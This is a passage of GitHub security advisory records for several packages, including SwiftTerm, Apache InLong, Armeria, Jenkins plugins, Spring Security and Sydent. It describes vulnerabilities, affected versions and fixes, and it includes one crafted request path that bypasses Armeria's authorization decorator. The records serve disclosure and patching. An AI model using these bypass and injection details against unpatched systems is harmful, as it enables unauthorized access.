[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-31206'}, {'type': 'WEB', 'url': 'https://github.com/apache/inlong/pull/7891'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/inlong'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/qb7zffo785wzpmsobjqcypodngw6kg6x'}]
|
{'cwe_ids': ['CWE-668'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T23:40:45Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-jq43-q8mx-r7mq
|
2023-07-14T21:58:43Z
|
2023-07-14T21:58:43Z
| null |
['CVE-2022-23465']
|
SwiftTerm Code Injection vulnerability
|
### Impact
Attacker could modify the window title via a certain character escape sequence and then insert it back to the command line in the user's terminal, e.g. when the user views a file containing the malicious sequence, which could allow the attacker to execute arbitrary commands.
### Credit
These bugs were found and disclosed by David Leadbeater <dgl@dgl.cx> (@dgl at Github.com)
### Patches
Fixed in version ce596e0dc8cdb288bc7ed5c6a59011ee3a8dc171
### Workarounds
There are no workarounds available
### References
Similar exploits to this existed in the past, for terminal emulators:
https://nvd.nist.gov/vuln/detail/CVE-2003-0063
https://nvd.nist.gov/vuln/detail/CVE-2008-2383
Additional background and information is also available:
https://marc.info/?l=bugtraq&m=104612710031920&w=2
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=510030
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N'}]
|
[{'package': {'ecosystem': 'purl-type:swift', 'name': 'https://github.com/migueldeicaza/SwiftTerm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/migueldeicaza/SwiftTerm/security/advisories/GHSA-jq43-q8mx-r7mq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-23465'}, {'type': 'WEB', 'url': 'https://github.com/migueldeicaza/SwiftTerm/commit/a94e6b24d24ce9680ad79884992e1dff8e150a31'}, {'type': 'PACKAGE', 'url': 'https://github.com/migueldeicaza/SwiftTerm'}]
|
{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-14T21:58:43Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-8rjh-3mhm-966q
|
2023-07-06T23:38:09Z
|
2023-07-06T21:14:59Z
| null |
['CVE-2023-31453']
|
Apache InLong Incorrect Permission Assignment for Critical Resource Vulnerability
|
Incorrect Permission Assignment for Critical Resource Vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.2.0 through 1.6.0. The attacker can delete others' subscriptions, even if they are not the owner
of the deleted subscription. Users are advised to upgrade to Apache InLong's 1.7.0 or cherry-pick https://github.com/apache/inlong/pull/7949 to solve it.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.inlong:manager-service'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'fixed': '1.7.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.inlong:manager-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'fixed': '1.7.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-31453'}, {'type': 'WEB', 'url': 'https://github.com/apache/inlong/pull/7949'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/inlong'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/9nz8o2skgc5230w276h4w92j0zstnl06'}]
|
{'cwe_ids': ['CWE-732'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T23:38:09Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-wvp2-9ppw-337j
|
2023-07-25T18:24:39Z
|
2023-07-25T18:24:39Z
| null |
['CVE-2023-38493']
|
Paths contain matrix variables bypass decorators
|
### Impact
Spring supports [Matrix variables](https://docs.spring.io/spring-framework/reference/web/webmvc/mvc-controller/ann-methods/matrix-variables.html).
When Spring integration is used, Armeria calls Spring controllers via `TomcatService` or `JettyService` with the path
that may contain matrix variables.
In this situation, the Armeria decorators might not invoked because of the matrix variables.
Let's see the following example:
```
// Spring controller
@GetMapping("/important/resources")
public String important() {...}
// Armeria decorator
ServerBuilder sb = ...
sb.decoratorUnder("/important/", authService);
```
If an attacker sends a request with `/important;a=b/resources`, the request would bypass the authrorizer
### Patches
- https://github.com/line/armeria-ghsa-wvp2-9ppw-337j/commit/9b0ec3e099cc05fbff11d7f1012a1dddb0000d0c
### Workarounds
Users can add decorators using regex. `e.g. "regex:^/important.*"`
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'com.linecorp.armeria:armeria'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.24.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.24.2'}}]
|
[{'type': 'WEB', 'url': 'https://github.com/line/armeria/security/advisories/GHSA-wvp2-9ppw-337j'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38493'}, {'type': 'WEB', 'url': 'https://github.com/line/armeria/commit/039db50bbfc88014ea8737fd1e1ddd6fd3fc4f07'}, {'type': 'WEB', 'url': 'https://github.com/line/armeria/commit/49e04ef231ad65750739529c7fa4ce946ff7588b'}, {'type': 'WEB', 'url': 'https://docs.spring.io/spring-framework/reference/web/webmvc/mvc-controller/ann-methods/matrix-variables.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/line/armeria'}]
|
{'cwe_ids': ['CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-25T18:24:39Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-5jc5-m87x-88fj
|
2023-08-01T21:39:57Z
|
2023-07-26T15:30:57Z
| null |
['CVE-2023-39155']
|
Secret displayed without masking by Chef Identity Plugin
|
Chef Identity Plugin stores the user.pem key in its global configuration file `io.chef.jenkins.ChefIdentityBuildWrapper.xml` on the Jenkins controller as part of its configuration.
While this key is stored encrypted on disk, in Chef Identity Plugin 2.0.3 and earlier the global configuration form does not mask the user.pem key form field, increasing the potential for attackers to observe and capture it.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:chef-identity'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.0.3'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39155'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-07-26/#SECURITY-3192'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/07/26/2'}]
|
{'cwe_ids': ['CWE-200', 'CWE-668'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-07-26T22:37:00Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-vc79-65pr-q82v
|
2023-07-27T16:11:53Z
|
2023-07-15T00:30:34Z
| null |
['CVE-2023-38337']
|
rswag vulnerable to arbitrary JSON and YAML file read via directory traversal
|
rswag before 2.10.1 allows remote attackers to read arbitrary JSON and YAML files via directory traversal, because rswag-api can expose a file that is not the OpenAPI (or Swagger) specification file of a project.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'RubyGems', 'name': 'rswag'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.10.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38337'}, {'type': 'WEB', 'url': 'https://github.com/rswag/rswag/issues/653'}, {'type': 'PACKAGE', 'url': 'https://github.com/rswag/rswag'}, {'type': 'WEB', 'url': 'https://github.com/rswag/rswag/compare/2.9.0...2.10.1'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rswag/CVE-2023-38337.yml'}]
|
{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-17T10:44:29Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-4r8x-2p26-976p
|
2023-08-01T15:37:19Z
|
2023-07-18T21:30:37Z
| null |
['CVE-2023-37788']
|
goproxy Denial of Service vulnerability
|
goproxy prior to pseudoversion 0.0.0-20230731152917-f99041a5c027 was discovered to contain an issue which can lead to a Denial of service (DoS) via unspecified vectors.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/elazarl/goproxy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.0-20230731152917-f99041a5c027'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37788'}, {'type': 'WEB', 'url': 'https://github.com/elazarl/goproxy/issues/502'}, {'type': 'WEB', 'url': 'https://github.com/elazarl/goproxy/pull/507'}, {'type': 'PACKAGE', 'url': 'https://github.com/elazarl/goproxy'}]
|
{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-19T22:11:42Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-7gj7-224w-vpr3
|
2023-07-27T16:27:15Z
|
2023-07-14T06:31:00Z
| null |
['CVE-2023-38286']
|
Thymeleaf, as used in Spring Boot Admin, allows sandbox bypass via crafted HTML
|
Thymeleaf through 3.1.1.RELEASE, as used in spring-boot-admin (aka Spring Boot Admin) through 3.1.1 and other products, allows sandbox bypass via crafted HTML. This may be relevant for SSTI (Server Side Template Injection) and code execution in spring-boot-admin if MailNotifier is enabled and there is write access to environment variables via the UI.
Spring Boot Admin 3.1.2 contains a [patch](https://github.com/codecentric/spring-boot-admin/pull/2615) for this issue.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'de.codecentric:spring-boot-admin-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.2'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38286'}, {'type': 'WEB', 'url': 'https://github.com/codecentric/spring-boot-admin/issues/2613'}, {'type': 'WEB', 'url': 'https://github.com/thymeleaf/thymeleaf/issues/966'}, {'type': 'WEB', 'url': 'https://github.com/codecentric/spring-boot-admin/pull/2615'}, {'type': 'WEB', 'url': 'https://github.com/codecentric/spring-boot-admin/commit/f1f6ac6f613e1c0afc121c8989f28b4155a6797a'}, {'type': 'WEB', 'url': 'https://github.com/codecentric/spring-boot-admin/commit/f1f6ac6f613e1c0afc121c8989f28b4155a6797a#diff-1ea8b144c29588e08221597d56d8be10b4b4a210f248a83f2e837152a3d2e0d7'}, {'type': 'PACKAGE', 'url': 'https://github.com/codecentric/spring-boot-admin'}, {'type': 'WEB', 'url': 'https://github.com/codecentric/spring-boot-admin/blob/master/spring-boot-admin-server/pom.xml'}, {'type': 'WEB', 'url': 'https://github.com/p1n93r/SpringBootAdmin-thymeleaf-SSTI'}]
|
{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-14T21:50:50Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-5g87-44p9-v4j7
|
2023-07-12T22:30:05Z
|
2023-07-12T18:30:39Z
| null |
['CVE-2023-37963']
|
Jenkins Benchmark Evaluator Plugin missing permission check
|
Jenkins Benchmark Evaluator Plugin 1.0.1 and earlier does not perform a permission check in a method implementing form validation.
This allows attackers with Overall/Read permission to connect to an attacker-specified URL and to check for the existence of directories, `.csv`, and `.ycsb` files on the Jenkins controller file system.
Additionally, this form validation method does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'io.jenkins.plugins:benchmark-evaluator'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37963'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-07-12/#SECURITY-3119'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/07/12/2'}]
|
{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-12T22:30:05Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-7jrr-fwhw-762v
|
2023-07-20T14:29:55Z
|
2023-07-12T18:30:39Z
| null |
['CVE-2023-37958']
|
Jenkins Sumologic Publisher Plugin vulnerable to cross-site request forgery
|
Jenkins Sumologic Publisher Plugin 2.2.1 and earlier does not perform a permission check in a method implementing form validation.
This allows attackers with Overall/Read permission to connect to an attacker-specified URL.
Additionally, this form validation method does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:sumologic-publisher'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.2.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37958'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-07-12/#SECURITY-3117'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/07/12/2'}]
|
{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-12T22:30:57Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-3h6f-g5f3-gc4w
|
2023-07-31T21:19:15Z
|
2023-07-19T15:30:26Z
| null |
['CVE-2023-34034']
|
Access Control Bypass in Spring Security
|
Using "**" as a pattern in Spring Security configuration for WebFlux creates a mismatch in pattern matching between Spring Security and Spring WebFlux, and the potential for a security bypass.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-config'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.6.0'}, {'fixed': '5.6.12'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-config'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.7.0'}, {'fixed': '5.7.10'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-config'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.8.0'}, {'fixed': '5.8.5'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-config'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.5'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-config'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.1.0'}, {'fixed': '6.1.2'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34034'}, {'type': 'WEB', 'url': 'https://ossindex.sonatype.org/vulnerability/CVE-2023-34034'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230814-0008/'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORKSECURITY-5777893'}, {'type': 'WEB', 'url': 'https://spring.io/security/cve-2023-34034'}]
|
{'cwe_ids': ['CWE-284'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-31T21:19:15Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-fxjg-28fm-pfxh
|
2023-07-06T22:10:49Z
|
2023-07-06T19:24:15Z
| null |
['CVE-2023-25504']
|
Apache Superset Server-Side Request Forgery vulnerability
|
A malicious actor who has been authenticated and granted specific permissions in Apache Superset may use the import dataset feature in order to conduct Server-Side Request Forgery attacks and query internal resources on behalf of the server where Superset is deployed. This vulnerability exists in Apache Superset versions up to and including 2.0.1.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'apache-superset'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25504'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/superset'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/tdnzkocfsqg2sbbornnp9g492fn4zhtx'}]
|
{'cwe_ids': ['CWE-918'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T22:10:49Z', 'nvd_published_at': '2023-04-17T17:15:00Z'}
|
1.4.0
|
GHSA-mjmq-gwgm-5qhm
|
2023-08-21T13:55:24Z
|
2023-07-10T18:30:49Z
| null |
['CVE-2023-35887']
|
Apache MINA SSHD information disclosure vulnerability
|
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Software Foundation Apache MINA.
In SFTP servers implemented using Apache MINA SSHD that use a RootedFileSystem, logged users may be able to discover "exists/does not exist" information about items outside the rooted tree via paths including parent navigation ("..") beyond the root, or involving symlinks.
This issue affects Apache MINA: from 1.0 before 2.10. Users are recommended to upgrade to 2.10
Until version 2.1.0, some of the code affected by this vulnerability appeared in org.apache.sshd:sshd-core. Version 2.1.0 contains a [commit](https://github.com/apache/mina-sshd/commit/10de190e7d3f9189deb76b8d08c72334a1fe2df0) where the code was moved to the package org.apache.sshd:sshd-common, which did not exist until version 2.1.0.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.sshd:sshd-common'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.10.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.sshd:sshd-sftp'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '2.10.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.sshd:sshd-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '2.10.0'}]}], 'database_specific': {'last_known_affected_version_range': '< 2.1.0'}}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35887'}, {'type': 'WEB', 'url': 'https://github.com/apache/mina-sshd/pull/362'}, {'type': 'WEB', 'url': 'https://github.com/apache/mina-sshd/commit/10de190e7d3f9189deb76b8d08c72334a1fe2df0'}, {'type': 'WEB', 'url': 'https://github.com/apache/mina-sshd/commit/a61e93035f06bff8fc622ad94870fb773d48b9f0'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/mina-sshd'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/SSHD-1324'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/b9qgtqvhnvgfpn0w1gz918p21p53tqk2'}]
|
{'cwe_ids': ['CWE-200', 'CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-10T21:53:01Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-pj4x-2xr5-w87m
|
2023-07-28T15:33:38Z
|
2023-07-28T15:33:38Z
| null |
['CVE-2023-38495']
|
Possible image tampering from missing image validation for Packages
|
### Impact
Crossplanes image backend does not validate the byte contents of Crossplane packages. As such, Crossplane does not detect if an attacker has tampered with a Package.
### Patches
The problem has been fixed in 1.11.5, 1.12.3 and 1.13.0, all the supported versions of Crossplane at the time of writing.
### Workarounds
Only using images from trusted sources and keeping Package editing/creating privileges to administrators only, which should be both considered already best practices.
### References
See `ADA-XP-23-11` in the Security Audit's [report](https://github.com/crossplane/crossplane/blob/ac8b24fe739c5d942ea885157148497f196c3dd3/security/ADA-security-audit-23.pdf).
### Credits
This was reported as `ADA-XP-23-11` by @AdamKorcz and @DavidKorczynski from Ada Logic and facilitated by OSTIF as part of the Security Audit sponsored by CNCF.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/crossplane/crossplane'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.5'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/crossplane/crossplane'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.12.0'}, {'fixed': '1.12.3'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/crossplane/crossplane/security/advisories/GHSA-pj4x-2xr5-w87m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38495'}, {'type': 'PACKAGE', 'url': 'https://github.com/crossplane/crossplane'}, {'type': 'WEB', 'url': 'https://github.com/crossplane/crossplane/blob/ac8b24fe739c5d942ea885157148497f196c3dd3/security/ADA-security-audit-23.pdf'}]
|
{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-28T15:33:38Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-g8c3-6fj2-87w7
|
2023-07-20T14:53:01Z
|
2023-07-12T18:30:38Z
| null |
['CVE-2023-37943']
|
Jenkins Active Directory Plugin vulnerable to Active Directory credential disclosure
|
Jenkins Active Directory Plugin allows testing a new, unsaved configuration by performing a connection test (the button labeled "Test Domain").
Active Directory Plugin 2.30 and earlier ignores the "Require TLS" and "StartTls" options and always performs the connection test to Active directory unencrypted. This allows attackers able to capture network traffic between the Jenkins controller and Active Directory servers to obtain Active Directory credentials.
This only affects the connection test. Connections established during the login process are encrypted if the corresponding TLS option is enabled.
Active Directory Plugin 2.30.1 considers the "Require TLS" and "StartTls" options for connection tests.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:active-directory'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.30.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37943'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-07-12/#SECURITY-3059'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/07/12/2'}]
|
{'cwe_ids': ['CWE-311'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-12T19:49:50Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-p6hw-wm59-3g5g
|
2023-08-04T18:41:16Z
|
2023-07-31T22:03:44Z
| null |
['CVE-2023-38686']
|
Sydent does not verify email server certificates
|
## Impact
If configured to send emails using TLS, Sydent does not verify SMTP servers' certificates. This makes Sydent's emails vulnerable to interception via a [man-in-the-middle (MITM) attack](https://en.wikipedia.org/wiki/Man-in-the-middle_attack). Attackers with privileged access to the network can intercept room invitations and address confirmation emails.
CVSS 3.1 overall score: 3.3 - [AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N/CR:L/IR:L/AR:X/MAV:A/MAC:H/MPR:N/MUI:N/MS:C/MC:L/MI:L/MA:N](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N/CR:L/IR:L/AR:X/MAV:A/MAC:H/MPR:N/MUI:N/MS:C/MC:L/MI:L/MA:N&version=3.1)
_Reported by Martin Schobert, [Pentagrid AG](https://pentagrid.ch/)._
### Details
Sydent can be configured to send emails over a TLS-encrypted socket by setting
```yaml
email:
tlsmode: "TLS" # or the legacy value "SSL"
```
in its config file. Alternatively it can be configured to use [Opportunistic TLS](https://en.wikipedia.org/wiki/Opportunistic_TLS) by setting
```yaml
email:
tlsmode: "STARTTLS"
```
In both situations, Sydent will encrypt its communication with the SMTP server when sending emails. **In affected versions, Sydent will not verify the destination server's certificate.**
### Vulnerability
Sydent sends email for two purposes:
- to inform a third party that they have been invited to a Matrix room by their email address; and
- to verify that a given Matrix user controls an email address.
Therefore, attackers capable of running a MITM attack can
1. Intercept room invitations sent to an email address. The invitation includes
- the room ID and its avatar, and
- the inviter's username, displayname and their avatar, and
- credentials for a guest Matrix account on the inviter's homeserver.
2. Intercept address ownership confirmation emails. This would allow the attacker to falsely claim ownership of the indented recipient's Matrix account, if that account was permitted to log in using an email address and no other authentication factors.
### Patches
This is patched in [Sydent 2.5.6](https://github.com/matrix-org/sydent/releases/tag/v2.5.6), see PR https://github.com/matrix-org/sydent/pull/574.
When patching, make sure that Sydent trusts the certificate of the server it is connecting to. This should happen automatically when using properly issued certificates. If you are using self-signed certificates, make sure to copy your Certification Authority certificate, or your self signed certificate if using only one, to the trust store of your operating system.
### Workarounds
One can ensure Sydent's emails fail to send by setting the configured SMTP server to a loopback or [non-routable](https://datatracker.ietf.org/doc/html/rfc1918#section-3) address under your control which does not have a listening SMTP server. For example:
```yaml
email:
smtphost: "localhost" # Assuming there is no SMTP server listening on localhost
```
### References
- https://github.com/matrix-org/sydent/pull/574 implements the fix.
- https://github.com/matrix-org/sydent/releases/tag/v2.5.6 is the release including this fix.
- https://docs.python.org/3/library/ssl.html?highlight=ssl#security-considerations details the best-practice advice on how to use the standard library `smtp` module safely.
- https://peps.python.org/pep-0476/ (accepted) proposed enabling TLS certificate verification by default in standard library HTTP clients.
- https://github.com/python/cpython/issues/91826 discusses enabling TLS certificate verification by default in the Python standard library, for SMTP and other protocols.
## For more information
If you have any questions or comments about this advisory, e-mail us at [security@matrix.org](mailto:security@matrix.org).
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'matrix-sydent'}, 'ecosystem_specific': {'affected_functions': ['sydent.util.emailutils.sendEmail']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.6'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/matrix-org/sydent/security/advisories/GHSA-p6hw-wm59-3g5g'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38686'}, {'type': 'WEB', 'url': 'https://github.com/python/cpython/issues/91826'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/sydent/pull/574'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/sydent/commit/1cd748307c6b168b66154e6c4db715d4b9551261'}, {'type': 'WEB', 'url': 'https://docs.python.org/3/library/ssl.html?highlight=ssl#security-considerations'}, {'type': 'PACKAGE', 'url': 'https://github.com/matrix-org/sydent'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/sydent/releases/tag/v2.5.6'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/matrix-sydent/PYSEC-2023-139.yaml'}, {'type': 'WEB', 'url': 'https://peps.python.org/pep-0476/'}]
|
{'cwe_ids': ['CWE-295'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-31T22:03:44Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-5652-92r9-3fx9
|
2023-07-18T19:10:54Z
|
2023-07-11T22:46:57Z
| null |
['CVE-2023-34089']
|
Decidim Cross-site Scripting vulnerability in the processes filter
|
### Impact
The processes filter feature is susceptible to Cross-site scripting. This allows a remote attacker to execute JavaScript code in the context of a currently logged-in user. An attacker could use this vulnerability to make other users endorse or support proposals they have no intention of supporting or endorsing.
### Patches
The problem was patched in [v0.27.3](https://github.com/decidim/decidim/releases/tag/v0.27.3) and [v0.26.7](https://github.com/decidim/decidim/releases/tag/v0.26.7)
|
